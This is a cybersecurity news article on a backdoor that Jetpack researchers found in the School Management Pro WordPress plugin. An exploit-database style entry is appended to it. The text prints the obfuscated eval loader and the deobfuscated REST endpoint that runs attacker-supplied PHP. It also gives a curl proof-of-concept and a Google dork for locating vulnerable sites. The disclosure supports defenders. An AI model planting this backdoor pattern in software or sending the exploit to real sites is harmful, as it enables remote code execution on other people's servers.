The premium version of School Management, a plugin schools use to operate and manage their websites, has contained the backdoor since at least version 8.9, researchers at website security service Jetpack said in a blog post without ruling out that it had been present in earlier versions. This page from a third-party site shows that version 8.9 was released last August.
Obvious backdoor
Jetpack said it discovered the backdoor after support team members at WordPress.com reported finding heavily obfuscated code on several sites that used School Management Pro. After deobfuscating it, they realized that the code, stashed in the license-checking part of the plugin, was intentionally placed there with the goal of giving outsiders the ability to take control of sites.
“The code itself isn’t all that interesting: it’s an obvious backdoor injected into the license-checking code of the plugin,” the Jetpack post said. “It allows any attacker to execute arbitrary PHP code on the site with the plugin installed.”
In its obfuscated form, the code looked like this:
}
$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs='" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey
After deobfuscation, the code was:
add_action( 'rest_api_init', function() {
register_rest_route(
'am-member', 'license',
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => function( $request ) {
$args = $request->get_params();
if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
eval( $args['blowf'] );
}
},
)
);
} );
Researchers wrote a proof-of-concept exploit that confirmed the obfuscated code was indeed a backdoor that allowed anyone with knowledge of it to execute code of their choice on any site running the plugin.
$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'httx://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713
The mystery remains
It’s not clear how many sites use the plugin. Weblizar, the India-based maker of School Management, says on its homepage that it has “340k+” customers for its free and premium themes and plugins, but the backdoor Jetpack found was only in School Management Pro. The backdoor wasn’t in the free version of the plugin, and there’s no indication it was put into other plugins Weblizar publishes.
“We have tried to get more information from the vendor about when the backdoor was injected, what versions are affected, and how the code ended up in the plugin in the first place,” the post said. “This effort has been unsuccessful, as the vendor says they do not know when or how the code came into their software.”
Attempts to reach Weblizar weren’t successful.
Now that the presence of the backdoor is public knowledge, attackers are likely to exploit it on any website using a vulnerable version of the plugin. Anyone who uses this plugin should update immediately. Even after patching, they should also carefully scan their site for signs of compromise, since the update won’t remove any new backdoors that may have been added.
# Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor
# Google Dork: 'wp-json/am-member/license'
# Exploit Author: Sobhan Mahmoodi
# Vendor Homepage: httxs://weblizar.com/plugins/school-management/
# Version: 8.9
# Tested on: windows/linux
Vulnerable code:
add_action( 'rest_api_init', function() {
register_rest_route(
'am-member', 'license',
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => function( $request ) {
$args = $request->get_params();
if ( isset( $args['blowfish'] ) && ! empty(
$args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )
) {
eval( $args['blowf'] );
}
};
)
);
} );
If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.
In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, and
given that eval executes the blowf value , Our favorite command must also be in this argument.
Proof of Concept:
curl -s -d 'blowfish=1' -d "blowf=system('id');" '
httx://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Suggest an edit to this article
Go to Cybersecurity Knowledge Base
Got to the Latest Cybersecurity News
Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.
Remember, CyberSecurity Starts With You!